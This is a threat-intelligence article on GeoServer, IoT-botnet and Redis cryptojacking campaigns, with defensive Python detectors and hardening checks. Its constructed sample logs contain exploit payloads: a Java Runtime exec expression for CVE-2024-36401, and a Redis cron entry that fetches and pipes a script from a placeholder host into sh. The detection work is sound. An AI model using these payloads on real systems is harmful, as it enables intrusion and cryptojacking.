Threat actors are shifting away from noisy, easily detected resource abuse toward quieter and more persistent ways of monetizing compromised systems. Recent campaigns target known vulnerabilities and exposed servers to build low-profile revenue streams, turning compromised devices into residential proxies, cryptocurrency mining infrastructure and IoT botnet nodes that earn money without drawing attention. The approach makes detection harder and keeps the victim exploitable for longer, a notable evolution in how attackers monetize access.
One of the primary campaigns identified exploits CVE-2024-36401, a critical remote code execution vulnerability in OSGeo GeoServer. Attackers use the flaw to drop custom executables that embed legitimate-looking software development kits (SDKs) or modified apps designed to earn passive income by sharing the victim's internet bandwidth, effectively turning the host into a residential proxy. The method is stealthy because it mimics a monetization model that some legitimate app developers use, so victims struggle to tell the malicious activity apart from normal app behaviour. The payloads, written in Dart, are served from a private file-sharing server, which helps them slip past conventional security controls. Because they consume minimal resources and run quietly in the background, the campaign gives the attackers a long-term, low-profile revenue stream.
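A defender reading this wants two things immediately: is my GeoServer on a fixed release, and is anyone already throwing CVE-2024-36401 at it? The script below is an added example, not code from the article or from the GeoServer project. The version check uses the fixed releases named in the GeoServer advisory (2.23.6, 2.24.4, 2.25.2). The log scanner works on Common Log Format lines from a reverse proxy in front of GeoServer and keys on the shape of the public proof-of-concept requests, which pass a Java-evaluating expression through parameters such as `valueReference` or `propertyName`; that indicator list is an assumption about what attackers still send, and the sample log lines are constructed, not captured traffic.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Indicator strings taken from the shape of public PoCs for CVE-2024-36401 (an OGC
# filter expression that evaluates Java code). Assumption: live attackers still use
# these tokens; tune for your environment.
INDICATORS = (
    re.compile(r"\bexec\s*\(", re.I),
    re.compile(r"java\.lang\.Runtime", re.I),
    re.compile(r"ProcessBuilder", re.I),
    re.compile(r"javax\.script", re.I),
)
# Query parameters GeoServer hands to the vulnerable expression evaluator.
EVAL_PARAMS = {"valuereference", "propertyname", "cql_filter", "filter"}

# Common Log Format as written by a reverse proxy in front of GeoServer.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# Fixed GeoServer 2.x releases per the project's advisory.
FIXED_IN = {23: 6, 24: 4, 25: 2}


def is_fixed(version: str) -> bool:
    """True if a GeoServer version string carries the CVE-2024-36401 fix."""
    major, minor, patch = (int(x) for x in version.split(".")[:3])
    if major != 2:
        return major > 2
    if minor in FIXED_IN:
        return patch >= FIXED_IN[minor]
    return minor > max(FIXED_IN)


def scan_line(line: str):
    """Return a finding dict if the access-log line looks like an exploit attempt."""
    m = LOG_RE.match(line)
    if not m:
        return None
    uri = m.group("uri")
    if "/geoserver/" not in uri.lower():
        return None
    # parse_qs percent-decodes values, so encoded and plain payloads look the same.
    params = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    for key, values in params.items():
        if key.lower() not in EVAL_PARAMS:
            continue
        for value in values:
            for ind in INDICATORS:
                if ind.search(value):
                    return {"ip": m.group("ip"), "ts": m.group("ts"), "param": key,
                            "indicator": ind.pattern, "status": int(m.group("status"))}
    return None


def scan_log(text: str):
    return [f for f in (scan_line(line) for line in text.splitlines()) if f]


# Constructed sample log (not real traffic): two exploit attempts, one plain
# percent-encoded, followed by a benign WFS request and a UI request.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Sep/2025:12:00:01 +0000] "GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'id') HTTP/1.1" 400 512
203.0.113.5 - - [10/Sep/2025:12:00:03 +0000] "GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec%28java.lang.Runtime.getRuntime%28%29%2C%27curl%20http%3A%2F%2F198.51.100.7%2Fdrop%27%29 HTTP/1.1" 200 0
198.51.100.2 - - [10/Sep/2025:12:00:05 +0000] "GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetFeature&typeNames=sf:archsites&propertyName=name HTTP/1.1" 200 2048
10.0.0.7 - - [10/Sep/2025:12:00:09 +0000] "GET /geoserver/web/ HTTP/1.1" 200 9000
"""

if __name__ == "__main__":
    print("2.24.3 fixed:", is_fixed("2.24.3"))
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A 200 response to a request that matched is the line to chase first: the first attempt in the sample failed (400) while the second succeeded, which in this campaign would be the point at which the Dart dropper lands. The scanner only sees GET parameters; POST bodies carrying the same expression need request-body logging or a WAF rule with the same indicators.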
Beyond passive monetization, researchers have also detailed the infrastructure behind large-scale IoT botnets such as PolarEdge and gayfemboy. PolarEdge is an Operational Relay Box (ORB) network made up of compromised enterprise-grade firewalls, routers and IP cameras. ORBs are valuable to attackers because they can quietly relay traffic without disrupting the device's core function, so owners and ISPs rarely notice. The botnet uses a custom TLS backdoor for encrypted command-and-control and log cleanup, and it has been observed listening on high, non-standard ports that traditional network scans often miss. The gayfemboy botnet, a variant of the well-known Mirai malware, targets vulnerabilities in products from vendors including DrayTek, TP-Link and Cisco. It is built for multiple CPU architectures and includes evasion techniques such as a "Killer" function that terminates the malware if it detects sandbox manipulation. Both campaigns illustrate the growing sophistication of modern botnets.
Another significant campaign comes from a threat actor tracked as TA-NATALSTATUS, which targets exposed Redis servers for cryptojacking. The attackers scan for unauthenticated Redis instances and then abuse legitimate Redis commands to write a malicious cron job to disk. The resulting script disables SELinux, blocks external connections to the Redis port to lock out rival actors, and kills competing mining processes. An evolution of an earlier campaign, this version adds rootkit-like features that hide malicious processes and alter file timestamps to mislead forensic analysis. The attackers even rename system binaries such as ps and top and replace them with versions that filter the malware out of the output of standard tools, a high level of sophistication in defense evasion.
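The "legitimate commands" route from an open Redis port to a cron job is well known: point `dir` at a cron directory with `CONFIG SET`, set `dbfilename` to a crontab name, `SET` a key whose value is a crontab line, then `SAVE` so the RDB dump is written where cron will read it. The script below is an added example, not the researchers' tooling: it replays Redis `MONITOR`-format lines (constructed here, not captured) and flags any client that completes that chain, and it checks a redis.conf for the settings that leave the server open to it. The sensitive-directory list, the payload hints and the 60-second window are assumptions a practitioner would tune.

```python
import re
from collections import defaultdict

# MONITOR line: <unix ts> [<db> <client addr>] "CMD" "arg" "arg" ...
MONITOR_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<rest>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

# Directories an attacker points `dir` at to turn an RDB dump into a cron job,
# an SSH key or a web shell (assumed list; extend for your hosts).
SENSITIVE_DIRS = ("/var/spool/cron", "/etc/cron", "/root/.ssh", "/home/", "/var/www")
PAYLOAD_HINTS = re.compile(r"\* \* \*|curl |wget |/bin/sh|bash -c", re.I)
WINDOW = 60.0  # max seconds between CONFIG SET dir and the SAVE that writes it


def parse(text):
    """Yield (ts, client, COMMAND, args) for each well-formed MONITOR line."""
    for line in text.splitlines():
        m = MONITOR_RE.match(line)
        if not m:
            continue
        args = ARG_RE.findall(m.group("rest"))
        if args:
            yield float(m.group("ts")), m.group("client"), args[0].upper(), args[1:]


def analyze(text):
    """One finding per client that completed the dir -> dbfilename -> SAVE chain."""
    state = defaultdict(dict)
    findings = []
    for ts, client, cmd, args in parse(text):
        s = state[client]
        if cmd == "CONFIG" and len(args) >= 3 and args[0].upper() == "SET":
            name, value = args[1].lower(), args[2]
            if name == "dir" and value.startswith(SENSITIVE_DIRS):
                s["dir"] = (value, ts)
            elif name == "dbfilename":
                s["dbfilename"] = value
        elif cmd in ("SET", "SETEX", "MSET") and args:
            payload = " ".join(args[1:])
            if PAYLOAD_HINTS.search(payload):
                s["payload"] = payload
        elif cmd in ("SAVE", "BGSAVE") and "dir" in s:
            directory, set_ts = s["dir"]
            if ts - set_ts <= WINDOW:
                findings.append({
                    "client": client, "dir": directory,
                    "dbfilename": s.get("dbfilename"), "payload": s.get("payload"),
                    "confidence": "high" if "payload" in s else "medium",
                })
                state[client] = {}
    return findings


def check_config(conf: str):
    """Flag redis.conf settings that make the chain above possible."""
    settings = defaultdict(list)
    for line in conf.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            key, _, value = line.partition(" ")
            settings[key.lower()].append(value.strip())
    issues = []
    if "yes" not in settings.get("protected-mode", ["yes"]):
        issues.append("protected-mode is off")
    if not settings.get("requirepass") or settings["requirepass"] == ['""']:
        issues.append("no requirepass set")
    # Redis listens on every interface when no bind directive is present.
    if any(b.startswith("0.0.0.0") or b == "*" for b in settings.get("bind", ["0.0.0.0"])):
        issues.append("bind exposes all interfaces")
    renamed = {v.split()[0].upper() for v in settings.get("rename-command", []) if v.split()}
    if "CONFIG" not in renamed:
        issues.append("CONFIG not renamed or disabled")
    return issues


# Constructed MONITOR output: one attacker session followed by a benign client.
SAMPLE_MONITOR = """\
1725000000.101 [0 203.0.113.9:51234] "PING"
1725000000.205 [0 203.0.113.9:51234] "CONFIG" "SET" "dir" "/var/spool/cron"
1725000000.310 [0 203.0.113.9:51234] "CONFIG" "SET" "dbfilename" "root"
1725000000.412 [0 203.0.113.9:51234] "SET" "backup1" "\\n*/2 * * * * curl -fsSL http://198.51.100.7/x.sh | sh\\n"
1725000000.520 [0 203.0.113.9:51234] "SAVE"
1725000001.001 [0 10.0.0.12:40001] "GET" "session:abc"
1725000001.050 [0 10.0.0.12:40001] "CONFIG" "GET" "maxmemory"
1725000001.120 [0 10.0.0.12:40001] "BGSAVE"
"""
WEAK_CONF = "bind 0.0.0.0\nprotected-mode no\nport 6379\n"
HARDENED_CONF = ('bind 127.0.0.1\nprotected-mode yes\nrequirepass replace-with-long-random-secret\n'
                 'rename-command CONFIG ""\nrename-command FLUSHALL ""\n')

if __name__ == "__main__":
    print(analyze(SAMPLE_MONITOR))
    print("weak:", check_config(WEAK_CONF), "hardened:", check_config(HARDENED_CONF))
```

`MONITOR` is a heavy diagnostic and not something to leave running on a busy instance; the same logic applies to command audit logs or to a packet capture of port 6379 decoded into RESP. On a host where `ps` and `top` have been swapped for filtering copies, trust the package manager's verification (`rpm -V` or `dpkg -V`) or a known-good static binary over the tools already on the box, and compare against `/proc` directly.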
The common thread running through these campaigns is a deliberate preference for stealth and persistence over aggressive resource exploitation. The attackers use known vulnerabilities to gain a foothold and then deploy customized, hard-to-detect malware that can run in the background for months. Whether the payoff comes from bandwidth sharing, relaying traffic through IoT botnets or cryptojacking, the goal is long-term, low-profile revenue. As the campaigns evolve they add custom protocols, rootkit-like features and sandbox evasion to stay hidden, which underscores the need for proactive, intelligence-driven defenses rather than reactive cleanup.